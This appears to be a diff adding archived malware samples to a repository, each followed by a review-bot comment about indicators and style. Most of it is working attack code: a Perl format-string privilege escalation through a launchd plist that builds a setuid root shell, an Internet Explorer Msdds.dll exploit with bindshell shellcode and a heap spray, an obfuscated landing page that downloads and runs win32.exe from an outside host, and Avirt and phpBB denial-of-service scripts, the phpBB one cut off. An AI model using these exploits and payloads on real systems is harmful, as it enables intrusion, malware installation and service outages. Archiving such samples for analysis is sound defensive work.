([$writeaddr+6, $writeaddr, $sc+12, $sc+16, $sc+28, $sc+22, $sc+26, $sc+24, $sc+10, $sc+14, $sc+18, $sc+30, $writeaddr+2, $sc+20, $sc+8, $writeaddr+4], # 0
[0x00e0, 0x11b8, 0x2f2f, 0x2f68, 0x3bb0, 0x50e3, 0x5353, 0x5454, 0x6850, 0x6873, 0x6d74, 0x80cd, 0x8111, 0x8970, 0xc031, 0xff01], );
$ENV{"TERM_PROGRAM"} = "." .
# string of write address
pack('l', $payload[0][0]) . pack('l', $payload[0][1]) . pack('l', $payload[0][2]) . pack('l', $payload[0][3]) . pack('l', $payload[0][4]) . pack('l', $payload[0][5]) . pack('l', $payload[0][6]) . pack('l', $payload[0][7]) . pack('l', $payload[0][8]) . pack('l', $payload[0][9]) . pack('l', $payload[0][10]) . pack('l', $payload[0][11]) . pack('l', $payload[0][12]) . pack('l', $payload[0][13]) . pack('l', $payload[0][14]) . pack('l', $payload[0][15]) . pack('l', $seteuid[0][0]) . pack('l', $seteuid[0][1]) . pack('l', $seteuid[0][2]) . pack('l', $seteuid[0][3]) ;
# lazy non looped length calculations
$pay1 = $payload[1][0];
$pay2 = ($payload[1][1] - $pay1 - 0x1 );
$pay3 = ($payload[1][2] - $pay1 - $pay2 - 0x1);
$pay4 = ($payload[1][3] - $pay1 - $pay2 - $pay3 - 0x1);
$pay5 = ($payload[1][4] - $pay1 - $pay2 - $pay3 - $pay4 - 0x1);
$pay6 = ($payload[1][5] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - 0x1);
$pay7 = ($payload[1][6] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 0x1);
$pay8 = ($payload[1][7] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - 0x1);
$pay9 = ($payload[1][8] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - 0x1);
$pay10 = ($payload[1][9] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - 0x1);
$pay11 = ($payload[1][10] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - 0x1);
$pay12 = ($payload[1][11] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - 0x1);
$pay13 = ($payload[1][12] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - 0x2);
$pay14 = ($payload[1][13] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - 0x2);
$pay15 = ($payload[1][14] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - 0x2);
$pay16 = ($payload[1][15] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - $pay15 - 0x3);
# seems I forgot the seteuid(0)
$pay17 = 0xff + $seteuid[1][0];
$pay18 = 0xff + ($seteuid[1][1] - $pay17);
$pay19 = 0xff + ($seteuid[1][2] - $pay17 - $pay18 ) ;
$pay20 = 0xff + ($seteuid[1][3] - $pay17 - $pay18 - $pay19 - 0x7ec8 - 0x270) ; # Something is fucking this write up... subtracting 0x8138 seems to help
# The offset is off by 6 if you are trying to debug this in gdb
$format =
"%." . $pay1 . "d" . "%246\$hn" .
"%." . $pay2 . "d" . "%247\$hn" .
"%." . $pay3 . "d" . "%248\$hn" .
"%." . $pay4 . "d" . "%249\$hn" .
"%." . $pay5 . "d" . "%250\$hn" .
"%." . $pay6 . "d" . "%251\$hn" .
"%." . $pay7 . "d" . "%252\$hn" .
"%." . $pay8 . "d" . "%253\$hn" .
"%." . $pay9 . "d" . "%254\$hn" .
"%." . $pay10 . "d" . "%255\$hn" .
"%." . $pay11 . "d" . "%256\$hn" .
"%." . $pay12 . "d" . "%257\$hn" .
"%." . $pay13 . "d" . "%258\$hn" .
"%." . $pay14 . "d" . "%259\$hn" .
"%." . $pay15 . "d" . "%260\$hn" .
"%." . $pay16 . "d" . "%261\$hn" .
"%." . $pay17 . "d" . "%262\$hn" .
"%." . $pay18 . "d" . "%263\$hn" .
"%." . $pay19 . "d" . "%264\$hn" .
"%." . $pay20 . "d" . "%265\$hn" ;
open(SUSH,">/tmp/aaa.c");
printf SUSH "int main(){setuid(0);setgid(0);system(\"/bin/sh\");}\n";
system("PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c");
open(PWNED,">com.pwnage.plist");
print PWNED "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>Label</key>
<string>" . "$format" .
"</string>
<key>ProgramArguments</key>
<array>
<string>http://www.digitalmunition.com</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>\n";
print "open a new window and type - \"launchctl load ./com.pwnage.plist\"\n";
system("/sbin/launchd");
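Review bot: The header never lists the on-disk artefacts this script leaves behind, which is what a responder triaging the archived sample needs first: it writes `/tmp/aaa.c`, compiles it to `/tmp/sh` (a `setuid(0)`/`setgid(0)` wrapper around `/bin/sh`), and drops `./com.pwnage.plist` whose `Label` string is the `%N$hn` format payload. I would add after the `# proactive security eh?` line: `# Artefacts: /tmp/aaa.c, /tmp/sh (setuid shell wrapper), ./com.pwnage.plist (Label = format string)`. Style: `open(SUSH, ">/tmp/aaa.c")` and `open(PWNED, ">com.pwnage.plist")` are two-argument opens on bareword handles with no `or die`, and the file has no `use strict; use warnings;`. The file-name header for this section is not visible above the `@ -0,0 +1,126 @@` line in this view.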


@ -0,0 +1,80 @@
#######################################################
#
# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day)
#
# Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous
#
# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
#
# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
#
# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
#
# Code usage : perl IE-Msddsdll-0day.pl > mypage.html
#
#######################################################
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
#######################################################
# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";
# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";
# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<700;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";
# Msdds.dll
my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F';
# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object></body></html>\n".
"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n";
# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";
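Review bot: The header names the vulnerable CLSID but not the shape of the page the script emits, and that shape is the detection signal: a JavaScript heap spray (the `bigblock`/`fillblock` doubling loop filling `memory[]` with 700 copies of block plus shellcode) followed by `<object classid="CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F">`. I would add to the header `# Output: one HTML page - JS heap spray + <object classid="CLSID:EC444CB6-...">; the CLSID is the key for detection and for the kill-bit mitigation`. Minor style: `print "$header $shellcode $code $footer"` inserts a space between each fragment; `print $header, $shellcode, $code, $footer;` is the plain form.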


@ -0,0 +1,82 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<NOSCRIPT>This page uses Javascript</NOSCRIPT>
<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">
document.write(unescape("%3c%68%74%6d%6c%3e%0d%0a%3c%62%6f%64%79%3e%0d%0a%3c%49%46%52%41%4d%45%20%73%72%63%3d%22%78%70%6c%2e%77%6d%66%22%0d%0a%20"));
document.write(unescape("%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%31%20%76%73%70%61%63%65%3d%31%20%68%73%70%61%63%65%3d%31%20%6d%61%72%67%69%6e%77"));
document.write(unescape("%69%64%74%68%3d%31%20%6d%61%72%67%69%6e%68%65%69%67%68%74%3d%31%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73"));
document.write(unescape("%63%72%6f%6c%6c%69%6e%67%3d%6e%6f%3e%0d%0a%20%20%3c%2f%49%46%52%41%4d%45%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%73%74%79"));
document.write(unescape("%6c%65%3e%0d%0a%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%68%74%74%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65"));
document.write(unescape("%74%2f%61%64%76%2f%30%31%2f%73%70%6c%6f%69%74%2e%61%6e%72%22%29%7d%0d%0a%3c%2f%73%74%79%6c%65%3e%0d%0a%3c%41%50%50%4c%45"));
document.write(unescape("%54%20%41%52%43%48%49%56%45%3d%27%63%6f%75%6e%74%2e%6a%61%72%27%20%43%4f%44%45%3d%27%42%6c%61%63%6b%42%6f%78%2e%63%6c%61"));
document.write(unescape("%73%73%27%20%57%49%44%54%48%3d%31%20%48%45%49%47%48%54%3d%31%3e%0d%0a%3c%50%41%52%41%4d%20%4e%41%4d%45%3d%27%75%72%6c%27"));
document.write(unescape("%20%56%41%4c%55%45%3d%27%68%74%74%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65%74%2f%61%64%76%2f%30%31%2f%77%69%6e%33"));
document.write(unescape("%32%2e%65%78%65%27%3e%3c%2f%41%50%50%4c%45%54%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%74%72%79%7b%0d%0a%64%6f%63%75%6d%65"));
document.write(unescape("%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%64%61%74%61%3d%60%26%23%31%30%39%26%23%31%31%35%26%23%34%35%26%23"));
document.write(unescape("%31%30%35%26%23%31%31%36%26%23%31%31%35%26%23%35%38%26%23%31%30%39%26%23%31%30%34%26%23%31%31%36%26%23%31%30%39%26%23%31"));
document.write(unescape("%30%38%26%23%35%38%26%23%31%30%32%26%23%31%30%35%26%23%31%30%38%26%23%31%30%31%26%23%35%38%26%23%34%37%26%23%34%37%26%23"));
document.write(unescape("%36%37%26%23%35%38%26%23%39%32%26%23%31%30%32%26%23%31%31%31%3b%6f%2e%6d%68%74%21%27%2b%27%68%74%74%70%3a%2f%2f%67%61%6d"));
document.write(unescape("%65%34%75%73%65%72%2e%6e%65%74%2f%2f%61%64%76%2f%2f%30%31%2f%2f%74%61%72%67%2e%63%68%27%2b%27%6d%3a%3a%2f%74%61%72%67%27"));
document.write(unescape("%2b%27%65%74%2e%68%74%6d%60%20%74%79%70%65%3d%60%74%65%78%74%2f%78%2d%73%63%72%69%70%74%6c%65%74%60%3e%3c%2f%6f%62%27%2b"));
document.write(unescape("%27%6a%65%63%74%3e%27%29%3b%0d%0a%7d%63%61%74%63%68%28%65%29%7b%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%73%63%72%69"));
document.write(unescape("%70%74%3e%0d%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25"));
document.write(unescape("%75%39%30%39%30%25%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65%25%75%30%30%34"));
document.write(unescape("%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30"));
document.write(unescape("%30%30%37%25%75%30%30%30%30%25%75%37%32%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25"));
document.write(unescape("%75%30%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75%31%33%65%38%25%75%30%30%30"));
document.write(unescape("%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36"));
document.write(unescape("%66%35%34%25%75%36%39%34%36%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30%30%25"));
document.write(unescape("%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30%36%61%25%75%30%30%36%61%25%75%30%39%65"));
document.write(unescape("%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36"));
document.write(unescape("%61%35%31%25%75%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25%75%65%38%30%30%25"));
document.write(unescape("%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30"));
document.write(unescape("%30%25%75%30%30%62%65%25%75%30%30%30%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62"));
document.write(unescape("%31%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36%32%36%39%25%75%36%31%37%32%25"));
document.write(unescape("%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34"));
document.write(unescape("%35%25%75%37%34%36%39%25%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38%25%75%37"));
document.write(unescape("%30%37%34%25%75%32%66%33%61%25%75%37%34%32%66%25%75%36%31%37%32%25%75%36%36%36%36%25%75%36%31%33%35%25%75%36%63%36%63%25"));
document.write(unescape("%75%36%32%32%65%25%75%37%61%36%39%25%75%36%31%32%66%25%75%37%36%36%34%25%75%33%30%32%66%25%75%32%66%33%31%25%75%36%39%37"));
document.write(unescape("%37%25%75%33%33%36%65%25%75%32%65%33%32%25%75%37%38%36%35%25%75%30%30%36%35%25%75%36%30%30%30%25%75%38%62%36%34%25%75%33"));
document.write(unescape("%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25"));
document.write(unescape("%75%30%38%35%62%25%75%64%61%38%39%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33"));
document.write(unescape("%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30%37%33%25%75%37%62%38%62%25%75%30"));
document.write(unescape("%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25"));
document.write(unescape("%75%31%33%31%65%25%75%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25%75%35%39%35"));
document.write(unescape("%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63"));
document.write(unescape("%31%30%37%25%75%30%32%65%30%25%75%37%33%38%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25"));
document.write(unescape("%75%38%35%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32%64%62%35%25%75%34%30%31"));
document.write(unescape("%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37"));
document.write(unescape("%32%35%30%25%75%36%33%36%66%25%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30%25"));
document.write(unescape("%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61%70%65%28%22%25%75%30%64%30%64%25%75"));
document.write(unescape("%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73"));
document.write(unescape("%75%62%73%74%72%69%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20%41%72%72%61%79"));
document.write(unescape("%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69"));
document.write(unescape("%6c%28%30%78%64%30%64%30%64%30%64%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61"));
document.write(unescape("%73%73%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d%42%31%43%33%2d%30%44%45%37"));
document.write(unescape("%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74"));
document.write(unescape("%73%5b%30%5d%2e%63%72%65%61%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63%68%28"));
document.write(unescape("%65%29%7b%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%3c%21%2d%2d%0d%0a%66%75%6e%63%74%69%6f"));
document.write(unescape("%6e%20%66%28%62%2c%20%61%2c%20%63%29%20%7b%20%72%65%74%75%72%6e%20%61%20%2b%20%62%20%2b%20%63%3b%20%7d%0d%0a%66%75%6e%63"));
document.write(unescape("%74%69%6f%6e%20%67%28%62%2c%20%61%29%20%7b%20%72%65%74%75%72%6e%20%61%20%2b%20%62%3b%20%7d%0d%0a%76%61%72%20%73%20%3d%20"));
document.write(unescape("%6e%65%77%20%41%72%72%61%79%0d%0a%28%0d%0a%20%22%22%2c%0d%0a%20%22%77%69%6e%33%32%2e%65%78%65%22%2c%0d%0a%20%22%68%74%74"));
document.write(unescape("%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65%74%2f%61%64%76%2f%30%31%2f%22%2c%0d%0a%20%22%6f%62%6a%65%63%74%22%2c%0d"));
document.write(unescape("%0a%20%22%63%6c%61%73%73%69%64%22%2c%0d%0a%20%66%28%22%30%43%30%22%2c%20%67%28%66%28%67%28%22%33%2d%31%31%44%30%2d%39%22"));
document.write(unescape("%2c%20%22%35%36%2d%36%35%41%22%29%2c%20%22%69%64%3a%42%44%39%36%43%35%22%2c%20%22%38%33%41%2d%30%22%29%2c%20%22%63%6c%73"));
document.write(unescape("%22%29%2c%20%67%28%22%39%45%33%36%22%2c%20%22%34%46%43%32%22%29%29%2c%0d%0a%20%67%28%66%28%22%66%74%2e%58%4d%4c%48%22%2c"));
document.write(unescape("%20%22%6f%73%6f%22%2c%20%22%54%54%50%22%29%2c%20%22%4d%69%63%72%22%29%2c%0d%0a%20%66%28%22%45%22%2c%20%22%47%22%2c%20%22"));
document.write(unescape("%54%22%29%2c%0d%0a%20%66%28%67%28%22%2e%53%74%72%22%2c%20%22%6f%64%62%22%29%2c%20%22%41%64%22%2c%20%22%65%61%6d%22%29%2c"));
document.write(unescape("%0d%0a%20%66%28%67%28%22%2e%53%68%65%22%2c%20%22%69%70%74%22%29%2c%20%22%57%53%63%72%22%2c%20%22%6c%6c%22%29%2c%0d%0a%20"));
document.write(unescape("%22%50%52%4f%43%45%53%53%22%2c%0d%0a%20%22%54%4d%50%22%2c%0d%0a%20%22%2f%5b%5e%2f%5d%2a%24%22%2c%0d%0a%20%22%2f%22%2c%0d"));
document.write(unescape("%0a%20%22%5c%5c%22%0d%0a%29%3b%0d%0a%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%73"));
document.write(unescape("%5b%33%5d%29%3b%0d%0a%61%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%73%5b%34%5d%2c%20%73%5b%35%5d%29%3b%0d%0a%77%69%74%68"));
document.write(unescape("%28%61%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%73%5b%36%5d%2c%20%73%5b%30%5d%29%29%0d%0a%7b%0d%0a%20%6f%70%65%6e%28%73"));
document.write(unescape("%5b%37%5d%2c%20%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%2e%72%65%70%6c%61%63%65%28%6e%65%77%20%52%65%67%45%78%70%28%73%5b"));
document.write(unescape("%31%32%5d%29%2c%20%73%5b%31%33%5d%20%2b%20%73%5b%31%5d%29%2c%20%66%61%6c%73%65%29%3b%0d%0a%20%73%65%6e%64%28%29%3b%0d%0a"));
document.write(unescape("%20%69%66%28%73%74%61%74%75%73%20%3c%20%34%30%30%29%0d%0a%20%20%77%69%74%68%28%61%2e%43%72%65%61%74%65%4f%62%6a%65%63%74"));
document.write(unescape("%28%73%5b%38%5d%2c%20%73%5b%30%5d%29%29%0d%0a%20%20%7b%0d%0a%20%20%20%54%79%70%65%20%3d%20%31%3b%0d%0a%20%20%20%4f%70%65"));
document.write(unescape("%6e%28%29%3b%0d%0a%20%20%20%57%72%69%74%65%28%72%65%73%70%6f%6e%73%65%42%6f%64%79%29%3b%0d%0a%20%20%20%77%69%74%68%28%61"));
document.write(unescape("%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%73%5b%39%5d%2c%20%73%5b%30%5d%29%29%0d%0a%20%20%20%7b%0d%0a%20%20%20%20%63%20"));
document.write(unescape("%3d%20%45%6e%76%69%72%6f%6e%6d%65%6e%74%28%73%5b%31%30%5d%29%28%73%5b%31%31%5d%29%20%2b%20%73%5b%31%34%5d%20%2b%20%73%5b"));
document.write(unescape("%31%5d%3b%0d%0a%20%20%20%20%53%61%76%65%54%6f%46%69%6c%65%28%63%2c%20%32%29%3b%0d%0a%20%20%20%20%45%78%65%63%28%63%29%3b"));
document.write(unescape("%0d%0a%20%20%20%7d%0d%0a%20%20%7d%0d%0a%7d%0d%0a%6c%6f%63%61%74%69%6f%6e%2e%72%65%70%6c%61%63%65%28%73%5b%32%5d%29%3b%0d"));
document.write(unescape("%0a%2f%2f%20%2d%2d%3e%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%74%6d%6c%3e"));
</SCRIPT>
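Review bot: The file carries no comment describing what the `document.write(unescape(...))` calls reconstruct, so a reader has to decode the percent-encoded strings by hand; that encoding is itself the first indicator of an obfuscated landing page. Decoding the visible strings shows it assembles an `<IFRAME src="xpl.wmf">`, a CSS cursor at `http://game4user.net/adv/01/sploit.anr`, an applet `count.jar`/`BlackBox.class` whose `url` parameter is `http://game4user.net/adv/01/win32.exe`, an `ms-its:mhtml:` scriptlet object pulling `targ.chm` from the same directory, and a second script that sprays and instantiates `CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F`. The final script's string-concatenation helpers `f`/`g` appear to assemble `clsid:BD96C556-65A3-11D0-983A-00C04FC29E36`, `Microsoft.XMLHTTP`, `ADODB.Stream` and `WScript.Shell` to fetch `win32.exe` into `%TMP%` and run it. I would add an HTML comment at the top listing those decoded URLs and both CLSIDs as the sample's network and host indicators.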

47
Perl/DoS.Perl.Avirt Normal file

@ -0,0 +1,47 @@
# Example for a possible DOS-attack against Avirt Mail Server ver3.5.
# There need to be 856 characters to overflow Server.
# Example : Trying example.com...
# Connected to example.com.
# Escape character is '^]'.
# +OK aVirt Mail POP3 Server Ready
# user fuckup
# +OK
# pass [856 characters]
# Overflow
# Hint : Avirt Mail Server ver3.3a has the same problem after 856
# characters (but then you can exploit it)
use IO::Socket;
print "Possible DOS-attack against Avirt Mail Server ver3.5\n";
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
if (not $ARGV[1]) {
print "Usage: $0 [host] [username]\n\n";
exit(0);
}
sub connecthost {
$host = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "25",) or die "Can't open connection to $ARGV[0] because $!\n";
$host->autoflush(1);
}
$bufferoverflow .= "A" x 856;
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "user $ARGV[1]\n";
print $host "pass $bufferoverflow\n";
print "close connection...\n";
close $host;
print "\nTesting...\n";
&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
close $host;
die "The host $ARGV[0] is not vulnerable to this attack.\n";
# by arbon(arbon@gmx.de)
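Review bot: The header's sample session shows a POP3 banner (`+OK aVirt Mail POP3 Server Ready`) with `user`/`pass` commands, but `connecthost` connects to `PeerPort => "25"`, so the comment and the code disagree about which service the 856-byte `pass` line is sent to; the header should match the code so the sample is catalogued correctly. The string passed to `&connecthost("...")` at the second connect is dead: `connecthost` reads no arguments, so the "is vulnerable" message is never printed and the script's only outputs are the `die` from a failed connect or the final "not vulnerable" line, which deserves a comment so nobody reads its output as a verdict. The same `&connecthost("...")` pattern is in `Perl/DoS.Perl.Fusion` below. Style: `&connecthost;` call syntax and the `$host` global assigned inside the sub; a `connecthost()` that returns the socket would be the conventional form.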

145
Perl/DoS.Perl.BBDoS.a Normal file

@ -0,0 +1,145 @@
## Name: NsT-phpBBDoS (Perl Version)
## Copyright: Neo Security Team
## Author: HaCkZaTaN
## Ported: g30rg3_x
## Date: 20/06/05
## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
## A Simple phpBB Registration And Search DoS Flooder.
##
## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
## [+]
## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
## [+] ported to Perl By g30rg3_x
## [+] Neo Security Team
## [+]
## [+] Host |without http://www.| victimshost.com
## [+] Path |example. /phpBB2/ or /| /phpBB2/
## [+] Flood Type |1=Registration 2=Search| 1
## [+] ..........................................................
## [+] ..........................................................
## [+] ..........................................................
## [+] ..............................................
## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"
use IO::Socket;
## Initialized X
$x = 0;
## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
);
print q(Host |without http://www.| );
$host = <STDIN>;
chop ($host);
